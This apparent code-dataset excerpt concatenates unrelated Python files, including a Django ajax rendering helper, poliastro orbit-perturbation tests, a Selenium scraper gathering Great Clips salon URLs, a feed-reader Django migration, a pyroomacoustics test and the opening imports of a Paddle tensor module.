redirect_url = reverse(viewname)
if request.is_ajax():
return JsonResponse({'redirect_url': redirect_url})
return HttpResponseRedirect(redirect_url)
def render(request, context, template_name, ajax_template_name):
'''
Render a template response to the client, choosing a
different template depending on whether the request was
initiated by ajaxform or a browser.
Typically this is used within a form-based view; `ajax_template_name`
is usually a partial containing only the form, while
`template_name` is a full page containing the form.
Regardless of which template is used, the same context is passed
into it.
'''
if request.is_ajax():
return JsonResponse({
'form_html': render_to_string(ajax_template_name, context,
request=request)
})
return HttpResponse(render_to_string(template_name, context,
request=request))
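# --- Hedged usage sketch (not part of the original module) -------------------
# A minimal Django form view showing how `redirect` and `render` above are
# typically combined. The form class, the template names and the
# 'contact_thanks' URL pattern name are hypothetical placeholders.
def example_form_view(request):
    from django import forms

    class ContactForm(forms.Form):
        email = forms.EmailField()

    form = ContactForm(request.POST or None)
    if request.method == 'POST' and form.is_valid():
        # Ajax clients receive {'redirect_url': ...}; browsers get a 302.
        return redirect(request, 'contact_thanks')
    # Ajax clients receive {'form_html': ...}; browsers get the full page.
    return render(
        request,
        context={'form': form},
        template_name='contact.html',
        ajax_template_name='contact_form_partial.html',
    )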
| 33.153846 | 73 | 0.701856 |
4a1f7cac2a0de6d38254e4a7c29292fb5c855dcf | 19,757 | py | Python | tests/tests_twobody/test_perturbations.py | zkl2/poliastro | 360817d2e74e15306c02aa05d80d4861cccf1cc2 | [
"MIT"
] | null | null | null | tests/tests_twobody/test_perturbations.py | zkl2/poliastro | 360817d2e74e15306c02aa05d80d4861cccf1cc2 | [
"MIT"
] | null | null | null | tests/tests_twobody/test_perturbations.py | zkl2/poliastro | 360817d2e74e15306c02aa05d80d4861cccf1cc2 | [
"MIT"
] | null | null | null | import functools
import numpy as np
import pytest
from astropy import units as u
from astropy.coordinates import Angle, solar_system_ephemeris
from astropy.tests.helper import assert_quantity_allclose
from astropy.time import Time
from numpy.linalg import norm
from poliastro.bodies import Earth, Moon, Sun
from poliastro.constants import H0_earth, Wdivc_sun, rho0_earth
from poliastro.core.elements import rv2coe
from poliastro.core.perturbations import (
J2_perturbation,
J3_perturbation,
atmospheric_drag_exponential,
atmospheric_drag_model,
radiation_pressure,
third_body,
)
from poliastro.core.propagation import func_twobody
from poliastro.earth.atmosphere import COESA76
from poliastro.ephem import build_ephem_interpolant
from poliastro.twobody import Orbit
from poliastro.twobody.events import LithobrakeEvent
from poliastro.twobody.propagation import cowell
@pytest.mark.slow
def test_J2_propagation_Earth():
# From Curtis example 12.2:
r0 = np.array([-2384.46, 5729.01, 3050.46]) # km
v0 = np.array([-7.36138, -2.98997, 1.64354]) # km/s
orbit = Orbit.from_vectors(Earth, r0 * u.km, v0 * u.km / u.s)
tofs = [48.0] * u.h
def f(t0, u_, k):
du_kep = func_twobody(t0, u_, k)
ax, ay, az = J2_perturbation(
t0, u_, k, J2=Earth.J2.value, R=Earth.R.to(u.km).value
)
du_ad = np.array([0, 0, 0, ax, ay, az])
return du_kep + du_ad
rr, vv = cowell(Earth.k, orbit.r, orbit.v, tofs, f=f)
k = Earth.k.to(u.km ** 3 / u.s ** 2).value
_, _, _, raan0, argp0, _ = rv2coe(k, r0, v0)
_, _, _, raan, argp, _ = rv2coe(k, rr[0].to(u.km).value, vv[0].to(u.km / u.s).value)
raan_variation_rate = (raan - raan0) / tofs[0].to(u.s).value # type: ignore
argp_variation_rate = (argp - argp0) / tofs[0].to(u.s).value # type: ignore
raan_variation_rate = (raan_variation_rate * u.rad / u.s).to(u.deg / u.h)
argp_variation_rate = (argp_variation_rate * u.rad / u.s).to(u.deg / u.h)
assert_quantity_allclose(raan_variation_rate, -0.172 * u.deg / u.h, rtol=1e-2)
assert_quantity_allclose(argp_variation_rate, 0.282 * u.deg / u.h, rtol=1e-2)
@pytest.mark.slow
@pytest.mark.parametrize(
"test_params",
[
{
"inc": 0.2618 * u.rad,
"da_max": 43.2 * u.m,
"dinc_max": 3.411e-5,
"decc_max": 3.549e-5,
},
{
"inc": 0.7854 * u.rad,
"da_max": 135.8 * u.m,
"dinc_max": 2.751e-5,
"decc_max": 9.243e-5,
},
{
"inc": 1.3090 * u.rad,
"da_max": 58.7 * u.m,
"dinc_max": 0.79e-5,
"decc_max": 10.02e-5,
},
{
"inc": 1.5708 * u.rad,
"da_max": 96.1 * u.m,
"dinc_max": 0.0,
"decc_max": 17.04e-5,
},
],
)
def test_J3_propagation_Earth(test_params):
# Nai-ming Qi, Qilong Sun, Yong Yang, (2018) "Effect of J3 perturbation on satellite position in LEO",
# Aircraft Engineering and Aerospace Technology, Vol. 90 Issue: 1,
# pp.74-86, https://doi.org/10.1108/AEAT-03-2015-0092
a_ini = 8970.667 * u.km
ecc_ini = 0.25 * u.one
raan_ini = 1.047 * u.rad
nu_ini = 0.0 * u.rad
argp_ini = 1.0 * u.rad
inc_ini = test_params["inc"]
k = Earth.k.to(u.km ** 3 / u.s ** 2).value
orbit = Orbit.from_classical(
Earth, a_ini, ecc_ini, inc_ini, raan_ini, argp_ini, nu_ini
)
def f(t0, u_, k):
du_kep = func_twobody(t0, u_, k)
ax, ay, az = J2_perturbation(
t0, u_, k, J2=Earth.J2.value, R=Earth.R.to(u.km).value
)
du_ad = np.array([0, 0, 0, ax, ay, az])
return du_kep + du_ad
tofs = np.linspace(0, 10.0 * u.day, 1000)
r_J2, v_J2 = cowell(
Earth.k,
orbit.r,
orbit.v,
tofs,
rtol=1e-8,
f=f,
)
def f_combined(t0, u_, k):
du_kep = func_twobody(t0, u_, k)
ax, ay, az = J2_perturbation(
t0, u_, k, J2=Earth.J2.value, R=Earth.R.to_value(u.km)
) + J3_perturbation(t0, u_, k, J3=Earth.J3.value, R=Earth.R.to_value(u.km))
du_ad = np.array([0, 0, 0, ax, ay, az])
return du_kep + du_ad
r_J3, v_J3 = cowell(Earth.k, orbit.r, orbit.v, tofs, rtol=1e-8, f=f_combined)
a_values_J2 = np.array(
[
rv2coe(k, ri, vi)[0] / (1.0 - rv2coe(k, ri, vi)[1] ** 2)
for ri, vi in zip(r_J2.to(u.km).value, v_J2.to(u.km / u.s).value)
]
)
a_values_J3 = np.array(
[
rv2coe(k, ri, vi)[0] / (1.0 - rv2coe(k, ri, vi)[1] ** 2)
for ri, vi in zip(r_J3.to(u.km).value, v_J3.to(u.km / u.s).value)
]
)
da_max = np.max(np.abs(a_values_J2 - a_values_J3))
ecc_values_J2 = np.array(
[
rv2coe(k, ri, vi)[1]
for ri, vi in zip(r_J2.to(u.km).value, v_J2.to(u.km / u.s).value)
]
)
ecc_values_J3 = np.array(
[
rv2coe(k, ri, vi)[1]
for ri, vi in zip(r_J3.to(u.km).value, v_J3.to(u.km / u.s).value)
]
)
decc_max = np.max(np.abs(ecc_values_J2 - ecc_values_J3))
inc_values_J2 = np.array(
[
rv2coe(k, ri, vi)[2]
for ri, vi in zip(r_J2.to(u.km).value, v_J2.to(u.km / u.s).value)
]
)
inc_values_J3 = np.array(
[
rv2coe(k, ri, vi)[2]
for ri, vi in zip(r_J3.to(u.km).value, v_J3.to(u.km / u.s).value)
]
)
dinc_max = np.max(np.abs(inc_values_J2 - inc_values_J3))
assert_quantity_allclose(dinc_max, test_params["dinc_max"], rtol=1e-1, atol=1e-7)
assert_quantity_allclose(decc_max, test_params["decc_max"], rtol=1e-1, atol=1e-7)
try:
assert_quantity_allclose(da_max * u.km, test_params["da_max"])
except AssertionError:
pytest.xfail("this assertion disagrees with the paper")
@pytest.mark.slow
def test_atmospheric_drag_exponential():
# http://farside.ph.utexas.edu/teaching/celestial/Celestialhtml/node94.html#sair (10.148)
    # Given the expression for \dot{r} / r, approximate \Delta r \approx F_r * \Delta t
R = Earth.R.to(u.km).value
k = Earth.k.to(u.km ** 3 / u.s ** 2).value
# Parameters of a circular orbit with h = 250 km (any value would do, but not too small)
orbit = Orbit.circular(Earth, 250 * u.km)
r0, _ = orbit.rv()
r0 = r0.to(u.km).value
# Parameters of a body
    C_D = 2.2  # dimensionless (any value would do)
A_over_m = ((np.pi / 4.0) * (u.m ** 2) / (100 * u.kg)).to_value(
u.km ** 2 / u.kg
) # km^2/kg
B = C_D * A_over_m
# Parameters of the atmosphere
rho0 = rho0_earth.to(u.kg / u.km ** 3).value # kg/km^3
H0 = H0_earth.to(u.km).value # km
tof = 100000 # s
dr_expected = -B * rho0 * np.exp(-(norm(r0) - R) / H0) * np.sqrt(k * norm(r0)) * tof
# Assuming the atmospheric decay during tof is small,
# dr_expected = F_r * tof (Newton's integration formula), where
# F_r = -B rho(r) |r|^2 sqrt(k / |r|^3) = -B rho(r) sqrt(k |r|)
def f(t0, u_, k):
du_kep = func_twobody(t0, u_, k)
ax, ay, az = atmospheric_drag_exponential(
t0, u_, k, R=R, C_D=C_D, A_over_m=A_over_m, H0=H0, rho0=rho0
)
du_ad = np.array([0, 0, 0, ax, ay, az])
return du_kep + du_ad
rr, _ = cowell(
Earth.k,
orbit.r,
orbit.v,
[tof] * u.s,
f=f,
)
assert_quantity_allclose(
norm(rr[0].to(u.km).value) - norm(r0), dr_expected, rtol=1e-2
)
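# --- Hedged editorial sketch (not part of the original test suite) -----------
# A standalone restatement of the analytic estimate used above: over a short
# interval dt, the radius of a circular orbit decays by roughly F_r * dt with
# F_r = -B * rho(r) * sqrt(k * |r|) and rho(r) = rho0 * exp(-(|r| - R) / H0).
# This helper is illustrative only and is not a poliastro API.
def _approx_drag_radius_change(r_norm, B, rho0, H0, R, k, dt):
    rho = rho0 * np.exp(-(r_norm - R) / H0)  # exponential atmosphere, kg/km^3
    F_r = -B * rho * np.sqrt(k * r_norm)  # radial decay rate, km/s
    return F_r * dt  # expected change in |r| over dt, km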
@pytest.mark.slow
def test_atmospheric_demise():
# Test an orbital decay that hits Earth. No analytic solution.
R = Earth.R.to(u.km).value
orbit = Orbit.circular(Earth, 230 * u.km)
t_decay = 48.2179 * u.d # not an analytic value
# Parameters of a body
    C_D = 2.2  # dimensionless (any value would do)
A_over_m = ((np.pi / 4.0) * (u.m ** 2) / (100 * u.kg)).to_value(
u.km ** 2 / u.kg
) # km^2/kg
# Parameters of the atmosphere
rho0 = rho0_earth.to(u.kg / u.km ** 3).value # kg/km^3
H0 = H0_earth.to(u.km).value # km
tofs = [365] * u.d # Actually hits the ground a bit after day 48
lithobrake_event = LithobrakeEvent(R)
events = [lithobrake_event]
def f(t0, u_, k):
du_kep = func_twobody(t0, u_, k)
ax, ay, az = atmospheric_drag_exponential(
t0, u_, k, R=R, C_D=C_D, A_over_m=A_over_m, H0=H0, rho0=rho0
)
du_ad = np.array([0, 0, 0, ax, ay, az])
return du_kep + du_ad
rr, _ = cowell(
Earth.k,
orbit.r,
orbit.v,
tofs,
events=events,
f=f,
)
assert_quantity_allclose(norm(rr[0].to(u.km).value), R, atol=1) # Below 1km
assert_quantity_allclose(lithobrake_event.last_t, t_decay, rtol=1e-2)
# Make sure having the event not firing is ok
tofs = [1] * u.d
lithobrake_event = LithobrakeEvent(R)
events = [lithobrake_event]
rr, _ = cowell(
Earth.k,
orbit.r,
orbit.v,
tofs,
events=events,
f=f,
)
assert lithobrake_event.last_t == tofs[-1]
@pytest.mark.slow
def test_atmospheric_demise_coesa76():
# Test an orbital decay that hits Earth. No analytic solution.
R = Earth.R.to(u.km).value
orbit = Orbit.circular(Earth, 250 * u.km)
t_decay = 7.17 * u.d
# Parameters of a body
C_D = 2.2 # Dimensionless (any value would do)
A_over_m = ((np.pi / 4.0) * (u.m ** 2) / (100 * u.kg)).to_value(
u.km ** 2 / u.kg
) # km^2/kg
tofs = [365] * u.d
lithobrake_event = LithobrakeEvent(R)
events = [lithobrake_event]
coesa76 = COESA76()
def f(t0, u_, k):
du_kep = func_twobody(t0, u_, k)
ax, ay, az = atmospheric_drag_model(
t0, u_, k, R=R, C_D=C_D, A_over_m=A_over_m, model=coesa76
)
du_ad = np.array([0, 0, 0, ax, ay, az])
return du_kep + du_ad
rr, _ = cowell(
Earth.k,
orbit.r,
orbit.v,
tofs,
events=events,
f=f,
)
assert_quantity_allclose(norm(rr[0].to(u.km).value), R, atol=1) # Below 1km
assert_quantity_allclose(lithobrake_event.last_t, t_decay, rtol=1e-2)
@pytest.mark.slow
def test_cowell_works_with_small_perturbations():
r0 = [-2384.46, 5729.01, 3050.46] * u.km
v0 = [-7.36138, -2.98997, 1.64354] * u.km / u.s
r_expected = [
13179.39566663877121754922,
-13026.25123408228319021873,
-9852.66213692844394245185,
] * u.km
v_expected = (
[2.78170542314378943516, 3.21596786944631274352, 0.16327165546278937791]
* u.km
/ u.s
)
initial = Orbit.from_vectors(Earth, r0, v0)
def accel(t0, state, k):
v_vec = state[3:]
norm_v = (v_vec * v_vec).sum() ** 0.5
return 1e-5 * v_vec / norm_v
def f(t0, u_, k):
du_kep = func_twobody(t0, u_, k)
ax, ay, az = accel(t0, u_, k)
du_ad = np.array([0, 0, 0, ax, ay, az])
return du_kep + du_ad
final = initial.propagate(3 * u.day, method=cowell, f=f)
assert_quantity_allclose(final.r, r_expected)
assert_quantity_allclose(final.v, v_expected)
@pytest.mark.slow
def test_cowell_converges_with_small_perturbations():
r0 = [-2384.46, 5729.01, 3050.46] * u.km
v0 = [-7.36138, -2.98997, 1.64354] * u.km / u.s
initial = Orbit.from_vectors(Earth, r0, v0)
def accel(t0, state, k):
v_vec = state[3:]
norm_v = (v_vec * v_vec).sum() ** 0.5
return 0.0 * v_vec / norm_v
def f(t0, u_, k):
du_kep = func_twobody(t0, u_, k)
ax, ay, az = accel(t0, u_, k)
du_ad = np.array([0, 0, 0, ax, ay, az])
return du_kep + du_ad
final = initial.propagate(initial.period, method=cowell, f=f)
assert_quantity_allclose(final.r, initial.r)
assert_quantity_allclose(final.v, initial.v)
moon_heo = {
"body": Moon,
"tof": 60 * u.day,
"raan": -0.06 * u.deg,
"argp": 0.15 * u.deg,
"inc": 0.08 * u.deg,
"orbit": [
26553.4 * u.km,
0.741 * u.one,
63.4 * u.deg,
0.0 * u.deg,
-10.12921 * u.deg,
0.0 * u.rad,
],
"period": 28 * u.day,
}
moon_leo = {
"body": Moon,
"tof": 60 * u.day,
"raan": -2.18 * 1e-4 * u.deg,
"argp": 15.0 * 1e-3 * u.deg,
"inc": 6.0 * 1e-4 * u.deg,
"orbit": [
6678.126 * u.km,
0.01 * u.one,
28.5 * u.deg,
0.0 * u.deg,
0.0 * u.deg,
0.0 * u.rad,
],
"period": 28 * u.day,
}
moon_geo = {
"body": Moon,
"tof": 60 * u.day,
"raan": 6.0 * u.deg,
"argp": -11.0 * u.deg,
"inc": 6.5 * 1e-3 * u.deg,
"orbit": [
42164.0 * u.km,
0.0001 * u.one,
1 * u.deg,
0.0 * u.deg,
0.0 * u.deg,
0.0 * u.rad,
],
"period": 28 * u.day,
}
sun_heo = {
"body": Sun,
"tof": 200 * u.day,
"raan": -0.10 * u.deg,
"argp": 0.2 * u.deg,
"inc": 0.1 * u.deg,
"orbit": [
26553.4 * u.km,
0.741 * u.one,
63.4 * u.deg,
0.0 * u.deg,
-10.12921 * u.deg,
0.0 * u.rad,
],
"period": 365 * u.day,
}
sun_leo = {
"body": Sun,
"tof": 200 * u.day,
"raan": -6.0 * 1e-3 * u.deg,
"argp": 0.02 * u.deg,
"inc": -1.0 * 1e-4 * u.deg,
"orbit": [
6678.126 * u.km,
0.01 * u.one,
28.5 * u.deg,
0.0 * u.deg,
0.0 * u.deg,
0.0 * u.rad,
],
"period": 365 * u.day,
}
sun_geo = {
"body": Sun,
"tof": 200 * u.day,
"raan": 8.7 * u.deg,
"argp": -5.5 * u.deg,
"inc": 5.5e-3 * u.deg,
"orbit": [
42164.0 * u.km,
0.0001 * u.one,
1 * u.deg,
0.0 * u.deg,
0.0 * u.deg,
0.0 * u.rad,
],
"period": 365 * u.day,
}
@pytest.mark.slow
@pytest.mark.parametrize(
"test_params",
[
moon_heo,
moon_geo,
moon_leo,
sun_heo,
sun_geo,
pytest.param(
sun_leo,
marks=pytest.mark.skip(
reason="here agreement required rtol=1e-10, too long for 200 days"
),
),
],
)
def test_3rd_body_Curtis(test_params):
# Based on example 12.11 from Howard Curtis
body = test_params["body"]
with solar_system_ephemeris.set("builtin"):
j_date = 2454283.0 * u.day
tof = (test_params["tof"]).to(u.s).value
body_r = build_ephem_interpolant(
body,
test_params["period"],
(j_date, j_date + test_params["tof"]),
rtol=1e-2,
)
epoch = Time(j_date, format="jd", scale="tdb")
initial = Orbit.from_classical(Earth, *test_params["orbit"], epoch=epoch)
def f(t0, u_, k):
du_kep = func_twobody(t0, u_, k)
ax, ay, az = third_body(
t0,
u_,
k,
k_third=body.k.to(u.km ** 3 / u.s ** 2).value,
perturbation_body=body_r,
)
du_ad = np.array([0, 0, 0, ax, ay, az])
return du_kep + du_ad
rr, vv = cowell(
Earth.k,
initial.r,
initial.v,
np.linspace(0, tof, 400) * u.s,
rtol=1e-10,
f=f,
)
incs, raans, argps = [], [], []
for ri, vi in zip(rr.to(u.km).value, vv.to(u.km / u.s).value):
angles = Angle(
rv2coe(Earth.k.to(u.km ** 3 / u.s ** 2).value, ri, vi)[2:5] * u.rad
) # inc, raan, argp
angles = angles.wrap_at(180 * u.deg)
incs.append(angles[0].value)
raans.append(angles[1].value)
argps.append(angles[2].value)
        # Averaging over the last 5 values, in the way Curtis does
inc_f, raan_f, argp_f = (
np.mean(incs[-5:]),
np.mean(raans[-5:]),
np.mean(argps[-5:]),
)
assert_quantity_allclose(
[
(raan_f * u.rad).to(u.deg) - test_params["orbit"][3],
(inc_f * u.rad).to(u.deg) - test_params["orbit"][2],
(argp_f * u.rad).to(u.deg) - test_params["orbit"][4],
],
[test_params["raan"], test_params["inc"], test_params["argp"]],
rtol=1e-1,
)
@pytest.fixture(scope="module")
def sun_r():
j_date = 2_438_400.5 * u.day
tof = 600 * u.day
return build_ephem_interpolant(Sun, 365 * u.day, (j_date, j_date + tof), rtol=1e-2)
def normalize_to_Curtis(t0, sun_r):
r = sun_r(t0)
return 149600000 * r / norm(r)
@pytest.mark.slow
@pytest.mark.parametrize(
"t_days,deltas_expected",
[
(200, [3e-3, -8e-3, -0.035, -80.0]),
(400, [-1.3e-3, 0.01, -0.07, 8.0]),
(600, [7e-3, 0.03, -0.10, -80.0]),
# (800, [-7.5e-3, 0.02, -0.13, 1.7]),
# (1000, [6e-3, 0.065, -0.165, -70.0]),
# (1095, [0.0, 0.06, -0.165, -10.0]),
],
)
def test_solar_pressure(t_days, deltas_expected, sun_r):
# Based on example 12.9 from Howard Curtis
with solar_system_ephemeris.set("builtin"):
j_date = 2_438_400.5 * u.day
tof = 600 * u.day
epoch = Time(j_date, format="jd", scale="tdb")
initial = Orbit.from_classical(
Earth,
10085.44 * u.km,
0.025422 * u.one,
88.3924 * u.deg,
45.38124 * u.deg,
227.493 * u.deg,
343.4268 * u.deg,
epoch=epoch,
)
# In Curtis, the mean distance to Sun is used. In order to validate against it, we have to do the same thing
sun_normalized = functools.partial(normalize_to_Curtis, sun_r=sun_r)
def f(t0, u_, k):
du_kep = func_twobody(t0, u_, k)
ax, ay, az = radiation_pressure(
t0,
u_,
k,
R=Earth.R.to(u.km).value,
C_R=2.0,
A_over_m=2e-4 / 100,
Wdivc_s=Wdivc_sun.value,
star=sun_normalized,
)
du_ad = np.array([0, 0, 0, ax, ay, az])
return du_kep + du_ad
rr, vv = cowell(
Earth.k,
initial.r,
initial.v,
np.linspace(0, (tof).to(u.s).value, 4000) * u.s,
rtol=1e-8,
f=f,
)
delta_eccs, delta_incs, delta_raans, delta_argps = [], [], [], []
for ri, vi in zip(rr.to(u.km).value, vv.to(u.km / u.s).value):
orbit_params = rv2coe(Earth.k.to(u.km ** 3 / u.s ** 2).value, ri, vi)
delta_eccs.append(orbit_params[1] - initial.ecc.value)
delta_incs.append(
(orbit_params[2] * u.rad).to(u.deg).value - initial.inc.value
)
delta_raans.append(
(orbit_params[3] * u.rad).to(u.deg).value - initial.raan.value
)
delta_argps.append(
(orbit_params[4] * u.rad).to(u.deg).value - initial.argp.value
)
        # Averaging over the last 5 values, in the way Curtis does
index = int(1.0 * t_days / tof.to(u.day).value * 4000) # type: ignore
delta_ecc, delta_inc, delta_raan, delta_argp = (
np.mean(delta_eccs[index - 5 : index]),
np.mean(delta_incs[index - 5 : index]),
np.mean(delta_raans[index - 5 : index]),
np.mean(delta_argps[index - 5 : index]),
)
assert_quantity_allclose(
[delta_ecc, delta_inc, delta_raan, delta_argp],
deltas_expected,
rtol=1e0, # TODO: Excessively low, rewrite test?
atol=1e-4,
)
| 28.842336 | 116 | 0.531305 |
4a1f7dfda3ee440f98ffc7df92580b3f29f36b86 | 2,933 | py | Python | Great Clips (US)/great_clips_store_urls.py | CAVIND46016/Locational-Data-Scraping | 234cee509a0d52fb1b2feebdd2400ea451fa7357 | [
"MIT"
] | 3 | 2020-04-18T03:13:52.000Z | 2020-06-18T03:55:52.000Z | Great Clips (US)/great_clips_store_urls.py | CAVIND46016/Locational-Data-Scraping | 234cee509a0d52fb1b2feebdd2400ea451fa7357 | [
"MIT"
] | null | null | null | Great Clips (US)/great_clips_store_urls.py | CAVIND46016/Locational-Data-Scraping | 234cee509a0d52fb1b2feebdd2400ea451fa7357 | [
"MIT"
] | null | null | null | import pickle
import json
from http.client import RemoteDisconnected
import time
from bs4 import BeautifulSoup
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.support.ui import WebDriverWait, Select
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium.common.exceptions import TimeoutException
import pandas as pd
def get_browser():
chrome_options = Options()
chrome_options.add_argument("--disable-extensions")
chrome_options.add_argument('--disable-notifications')
driver = webdriver.Chrome(executable_path='C:\\Aptana Workspace\\chromedriver.exe',
options=chrome_options)
return driver
def main():
us_postal_codes_df = pd.read_csv("us_postal_codes.csv")
us_postal_codes_df = us_postal_codes_df.loc[~us_postal_codes_df['Zip Code'].isnull()]
us_postal_codes_df = us_postal_codes_df.loc[(us_postal_codes_df['State'] == 'New York') &
(us_postal_codes_df['County'] == 'New York')]
all_codes = us_postal_codes_df['Zip Code'].unique().tolist()
length_of_all_codes = len(all_codes)
driver = get_browser()
base_url = "https://www.greatclips.com"
page_url = "https://www.greatclips.com/#"
try:
driver.set_page_load_timeout(40)
driver.get(page_url)
except TimeoutException:
raise Exception(f"\t{page_url} - Timed out receiving message from renderer")
except RemoteDisconnected:
raise Exception(f"\tError 404: {page_url} not found.")
WebDriverWait(driver, timeout=40).until(EC.presence_of_element_located((By.CLASS_NAME, "fas-searchbar")))
srch_bar = driver.find_element_by_id("term")
srch_btn = driver.find_element_by_class_name("fas-search-btn")
all_store_urls = set()
for idx, zip_code in enumerate(all_codes):
print(f"Processing zip code {idx+1} of {length_of_all_codes} - {zip_code}...")
srch_bar.send_keys(str(zip_code))
srch_btn.click()
time.sleep(5)
soup = BeautifulSoup(driver.page_source, "html.parser")
results_class = soup.find("div", attrs={"class": "fas-results"})
salon_titles = results_class.find_all("h2", attrs={"class": "fas-salon-title"})
for salon_title in salon_titles:
href = salon_title.find("a")['href']
all_store_urls.add(f"{base_url}{href}")
srch_bar.clear()
driver.quit()
print(f"Pickling list of {len(all_store_urls)} store_urls to file...")
with open('great_clips_store_urls.pkl', 'wb') as pkl_file:
pickle.dump(all_store_urls, pkl_file)
print(all_store_urls)
print("DONE!!!")
if __name__ == "__main__":
main()
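# --- Hedged follow-up sketch (not part of the original script) ---------------
# A later processing stage would read the pickled URL set back like this:
#
#   with open('great_clips_store_urls.pkl', 'rb') as pkl_file:
#       store_urls = pickle.load(pkl_file)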
| 36.209877 | 110 | 0.662121 |
4a1f7e9b68ad14590b609ce183d50263a7e99b63 | 858 | py | Python | pyroomacoustics/tests/test_issue_87.py | Womac/pyroomacoustics | af452ea42686eb12df34dd7ffdb0c833b64b27f9 | [
"MIT"
] | 915 | 2016-02-08T08:10:37.000Z | 2022-03-31T17:33:21.000Z | pyroomacoustics/tests/test_issue_87.py | zha80052/pyroomacoustics | 15a86425b68969b2109860ca3614f0cbf92b1bd0 | [
"MIT"
] | 212 | 2017-02-06T13:06:30.000Z | 2022-03-28T14:32:15.000Z | pyroomacoustics/tests/test_issue_87.py | zha80052/pyroomacoustics | 15a86425b68969b2109860ca3614f0cbf92b1bd0 | [
"MIT"
] | 513 | 2016-11-15T05:41:49.000Z | 2022-03-29T15:41:09.000Z | import unittest
import numpy as np
import pyroomacoustics as pra
def make_filters(n_mics):
# Location of original source
    azimuth = 61.0 / 180.0 * np.pi  # 61 degrees
# algorithms parameters
c = 343.0
fs = 16000
    # circular microphone array, n_mics microphones, radius 15 cm
R = pra.circular_2D_array([0, 0], n_mics, 0.0, 0.15)
# propagation filter bank
propagation_vector = -np.array([np.cos(azimuth), np.sin(azimuth)])
delays = np.dot(R.T, propagation_vector) / c * fs # in fractional samples
filter_bank = pra.fractional_delay_filter_bank(delays)
return filter_bank
class TestIssue87(unittest.TestCase):
def test_12_mics(self):
# this was working
make_filters(12)
def test_6_mics(self):
# but this failed
make_filters(6)
if __name__ == "__main__":
unittest.main()
| 22.578947 | 78 | 0.666667 |
4a1f7ec4e8f3f15edbe79d334cda444ec27185bd | 3,384 | py | Python | feeds/migrations/0001_initial.py | StevenMonty/django-feed-reader | 95731a4178f028f6539c55dce77928a377a9cdd9 | [
"MIT"
] | 21 | 2019-06-21T09:17:32.000Z | 2022-03-04T06:55:36.000Z | feeds/migrations/0001_initial.py | StevenMonty/django-feed-reader | 95731a4178f028f6539c55dce77928a377a9cdd9 | [
"MIT"
] | 7 | 2020-09-07T12:21:55.000Z | 2020-10-27T17:39:58.000Z | feeds/migrations/0001_initial.py | StevenMonty/django-feed-reader | 95731a4178f028f6539c55dce77928a377a9cdd9 | [
"MIT"
] | 15 | 2019-09-01T03:58:17.000Z | 2022-01-16T05:25:40.000Z | # Generated by Django 2.2.1 on 2019-06-02 17:30
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Source',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, max_length=255, null=True)),
('site_url', models.CharField(blank=True, max_length=255, null=True)),
('feed_url', models.CharField(max_length=255)),
('image_url', models.CharField(blank=True, max_length=255, null=True)),
('last_polled', models.DateTimeField(blank=True, max_length=255, null=True)),
('due_poll', models.DateTimeField()),
('etag', models.CharField(blank=True, max_length=255, null=True)),
('last_modified', models.CharField(blank=True, max_length=255, null=True)),
('last_result', models.CharField(blank=True, max_length=255, null=True)),
('interval', models.PositiveIntegerField(default=400)),
('last_success', models.DateTimeField(null=True)),
('last_change', models.DateTimeField(null=True)),
('live', models.BooleanField(default=True)),
('status_code', models.PositiveIntegerField(default=0)),
('last_302_url', models.CharField(blank=True, max_length=255, null=True)),
('last_302_start', models.DateTimeField(blank=True, null=True)),
('max_index', models.IntegerField(default=0)),
('num_subs', models.IntegerField(default=1)),
('is_cloudflare', models.BooleanField(default=False)),
],
),
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.TextField(blank=True)),
('body', models.TextField()),
('link', models.CharField(blank=True, max_length=512, null=True)),
('found', models.DateTimeField(auto_now_add=True)),
('created', models.DateTimeField(db_index=True)),
('guid', models.CharField(blank=True, db_index=True, max_length=255, null=True)),
('author', models.CharField(blank=True, max_length=255, null=True)),
('index', models.IntegerField(db_index=True)),
('source', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='feeds.Source')),
],
options={
'ordering': ['index'],
},
),
migrations.CreateModel(
name='Enclosure',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('length', models.IntegerField(default=0)),
('href', models.CharField(max_length=512)),
('type', models.CharField(max_length=256)),
('post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='feeds.Post')),
],
),
]
| 49.043478 | 114 | 0.573877 |
4a1f7f5dc9900ca0fbf2c450e14dc5e839febe39 | 111,333 | py | Python | python/paddle/tensor/manipulation.py | wwjiang007/Paddle | bdeb479c0edd1ab9bb5f696df3573dad63d67885 | [
"Apache-2.0"
] | 1 | 2022-02-07T05:37:49.000Z | 2022-02-07T05:37:49.000Z | python/paddle/tensor/manipulation.py | wwjiang007/Paddle | bdeb479c0edd1ab9bb5f696df3573dad63d67885 | [
"Apache-2.0"
] | null | null | null | python/paddle/tensor/manipulation.py | wwjiang007/Paddle | bdeb479c0edd1ab9bb5f696df3573dad63d67885 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
from collections import Counter
from ..fluid.layers import core
from ..fluid.layer_helper import LayerHelper
from ..fluid.framework import Variable, OpProtoHolder, in_dygraph_mode, convert_np_dtype_to_dtype_, device_guard, dygraph_only
from ..fluid.data_feeder import convert_dtype, check_variable_and_dtype, check_type, check_dtype
from ..fluid.layers.tensor import fill_constant
from ..fluid.layers import utils
import numpy as np
# TODO: define functions to manipulate a tensor
from ..fluid.layers import cast # noqa: F401
from ..fluid.layers import slice # noqa: F401
from ..fluid.layers import transpose # noqa: F401
from ..fluid.layers import unstack # noqa: F401
from ..fluid.layers import scatter_nd # noqa: F401
from ..fluid.layers import shard_index # noqa: F401
